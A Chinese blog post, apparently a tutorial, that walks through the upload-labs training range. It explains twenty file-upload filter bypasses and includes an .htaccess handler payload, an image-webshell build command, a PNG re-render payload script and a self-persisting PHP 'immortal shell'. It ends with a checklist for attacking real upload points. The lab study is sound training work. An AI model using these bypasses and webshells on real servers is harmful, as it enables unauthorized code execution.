文件上传漏洞总结

admin 2023年3月12日17:17:24文件上传漏洞总结已关闭评论35 views字数 3641阅读12分8秒阅读模式

漏洞介绍

文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。一般都是指“上传Web脚本能够被服务器解析”的问题。

漏洞详解

我们的测试平台:upload_labs
环境:phpstudy2016 强烈建议用2016 会方便很多

第一关:前台js验证

我们上传文件会被前端拦截

文件上传漏洞总结

右键查看网页源代码,发现在上传时候调用了checkFile方法进行了检查,如果检查失败会返回false导致上传失败

文件上传漏洞总结

文件上传漏洞总结
三种解决方法
其实是4种,但是禁用前端js可能造成很多麻烦我们去掉这种
抓包修改文件类型
将shell的后缀改为jpg绕过前端验证,抓包时在改回php

文件上传漏洞总结

burp修改response返回值
刷新第一关页面,burp抓包拦截response包

文件上传漏洞总结

将onsubmit直接删除,或者将checkFile改为return true都可以绕过

文件上传漏洞总结

通过保存源代码修改action

文件上传漏洞总结

原来网页代码是没有action的,如果没有action默认就是发送到本页面,我们修改function然后添加一个action就可以上传成功

第二关:content-type类型绕过

这关判断了content-type类型,如果满足才可以上传否则就会出错

文件上传漏洞总结

抓包将修改类型上传成功

文件上传漏洞总结

第三关:黑名单验证绕过

在这之前修改apache下的httpd.conf文件,将这条的注释去掉,代表php文件 phtml文件都可以解析为php ,当然我们也可以自己添加文件类型

文件上传漏洞总结

我们看一下源码

文件上传漏洞总结

因此我们可以上传phtml来绕过黑名单验证

文件上传漏洞总结

第四关:.htaccess绕过

这关的源码其实和上一关相同,只不过出现了许多黑名单

文件上传漏洞总结

修改配置文件,原本是none改为all,重启apache

文件上传漏洞总结

我们首先上传一个名字为.htaccess的文件

<FilesMatch "4">   //意思为和这个文件同目录的文件,只要名字中带有4都会被当做php解析
SetHandler application/x-httpd-php
</FilesMatch>

上传文件名为114.png文件,带有4所以被解析成php

文件上传漏洞总结

第五关:大小写绕过

第五关源码:

文件上传漏洞总结

对比第三关源码少了一个大小写转换

文件上传漏洞总结

由于他没有禁止大写,直接大写后缀上传

文件上传漏洞总结

第六关:后缀去空绕过

这关源码因为没有去掉最后的空格,因此在和数组进行比较时会匹配失败,导致上传成功,上传上的文件因为系统会自动把后边的空格去掉,形成一个可以解析的php后缀

文件上传漏洞总结

burp抓包多加一个空格

文件上传漏洞总结

上传成功

文件上传漏洞总结

第七关:后缀加点绕过

和第六关思路一样,绕过之后系统会自动把点去掉

文件上传漏洞总结

第八关:::\$DATA绕过

在window的时候如果文件名+"::\$DATA"会把::\$DATA之后的数据当成文件流处理,不会检测后缀名,且保持::\$DATA之前的文件名,他的目的就是不检查后缀名
网站没有过滤::\$DATA,我们可以绕过

文件上传漏洞总结

第九关:双写.(空格).绕过

文件上传漏洞总结

这关把所有的都验证了,但是他是顺序执行只执行了一次 我们在shell.php后加上.(空格). 先删除一个点,然后最后去除空格,但是前面还有一个点没有去掉,导致绕过

文件上传漏洞总结

第十关:双写绕过

文件上传漏洞总结

将文件名和数组中进行匹配,如果匹配上则把匹配内容改位空字符串
我们可以双写php绕过 pphphp

文件上传漏洞总结

其实上面这几关全部可以用php..绕过,但是大家还是老老实实的用应该的方法练习一遍最好

第十一关:GET %00截断绕过

00截断是当程序遇到00时会自动停止不再解析之后的内容,试用php5.3一下的版本,我们把版本切换到5.2.17
踩坑:需要把magic_quotes_gpc参数关闭,注意默认就是关闭的!!但是我尝试了还是不能成功,如果你也遇到这种情况,咱们打开之后再给他关闭一下就可以了。
上传路径可控,修改上传路径00截断上传成功

文件上传漏洞总结

因为是根据上传路径拼接的,所以不能在文件名的地方进行00截断

文件上传漏洞总结

第十二关:POST %00截断绕过

这次的上传路径地址是post方法发送的

文件上传漏洞总结

get和post的区别就是get能自动url解码,而post却不能,因此我们要在burp里对%00进行解码

文件上传漏洞总结

上传成功

文件上传漏洞总结

十三、十四关:图片马配合文件上传漏洞

使用命令生成图片马

copy a.jpg /b + cc.php /a shell.jpg

上传成功之后使用include.php文件包含成功

文件上传漏洞总结

十五关:和13、14关相同

操作一样。但是需要打开php_exif,本函数可用来避免调用其它 exif 函数用到了不支持的文件类型上或和 \$_SERVER['HTTP_ACCEPT'] 结合使用来检查浏览器是否可以显示某个指定的图像。

十六关:二次渲染绕过

imagecreatefrompng PNG 文件或 URL 新建一图像
二次渲染就是我们上传图像之后,发现图片某些位置被删除了,导致我们的命令不能成功执行,于是我们要把渲染过后的文件保存出来,使用16进制编辑器和没渲染的位置进行对比,找到不变的位置,在这里插入我们的恶意代码
我们上传图片马之后发现已经解析失败了

文件上传漏洞总结

渲染后的文件

文件上传漏洞总结

渲染前的文件

文件上传漏洞总结

但是手工插入很难成功,我们使用脚本

```
<?php
$p = array(0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23,
          0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae,
          0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc,
          0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f,
          0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c,
          0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d,
          0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1,
          0x66, 0x44, 0x50, 0x33);

$img = imagecreatetruecolor(32, 32);

for ($y = 0; $y < sizeof($p); $y += 3) {
  $r = $p[$y];
  $g = $p[$y+1];
  $b = $p[$y+2];
  $color = imagecolorallocate($img, $r, $g, $b);
  imagesetpixel($img, round($y / 3), 0, $color);
}

imagepng($img,'./1.png');
?>
```

我们找到php 目录 执行 php 1.php 就会给我们生成一个1.png文件
010editor打开

文件上传漏洞总结

之后使用这种形式传参就可以成功执行命令

文件上传漏洞总结

十七关:条件竞争漏洞

需要用到不死马

<?php
ignore_user_abort(true);
  set_time_limit(0);
  @unlink(__FILE__);
  $file = '555.php';
  $code = '<?php phpinfo();?>';
  while (1){
      file_put_contents($file,$code);
      usleep(5000);
  }
?>

我们看代码他是先将图片上传上去,才开始进行判断后缀名、二次渲染。如果我们在上传上去的一瞬间访问这个文件,那他就不能对这个文件删除、二次渲染。这就相当于我们打开了一个文件,然后再去删除这个文件,就会提示这个文件在另一程序中打开无法删除。

文件上传漏洞总结

由于代码是先移动文件位置在对文件做判断,我们可以使用Burp不停抓包,利用判断之前的间隙运行成功不死马

文件上传漏洞总结

一个用于访问路径,一个用于上传,返回值200表示已经生成好了内存马

十八关:条件竞争漏洞配合解析漏洞

和十七关相同,只不过要用解析漏洞的路径

十九关:move_uploaded_file()特性绕过

move_uploaded_file()有这么一个特性,会忽略掉文件末尾的 /.
所以我们把他修改为如图所示

文件上传漏洞总结

成功访问

文件上传漏洞总结

第二十关:数组绕过

文件上传漏洞总结

问题出在这里,reset是获取第一个元素
但是如果我们传的参数为

$file=>{
'0'=>'upload20.php/'
'2'=>'jpg'
}

php的数组既可以当数组又可以当字典,这里其实是字典的用法
这时候呢reset函数取出第一个值是upload20.php 和点拼接 然后count获取长度为2 ,然后2-1为1 但是file数组中没有Key值为1的数字,所以返回为空 所以文件名为upload20.php/ 而\$ext获取的是最后面的值因而为jpg也绕过了判断

文件上传漏洞总结

上传成功

文件上传漏洞总结

总结

条件: 寻找一个上传点,查看上传点是否可用。
利用: 首先判断是程序员自己写的上传点,还是编辑器的上传功能 如果是编辑器上传功能,goolge当前编辑器的漏洞 如果是程序员写的上传点 上传一个正常的jpg图片 查看上传点是否可用 上传一个正常的jpg图片,burp拦截,修改后缀为php (可以检测前端验证 MIME检测 文件内容检测 后缀检测) 上传一个正常的jpg图片,burp拦截, 00截断 1.php%00.jpg 判断服务器是什么类型,web服务器程序,是什么类型,版本号多少 利用解析漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年3月12日17:17:24
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   文件上传漏洞总结http://cn-sec.com/archives/1599512.html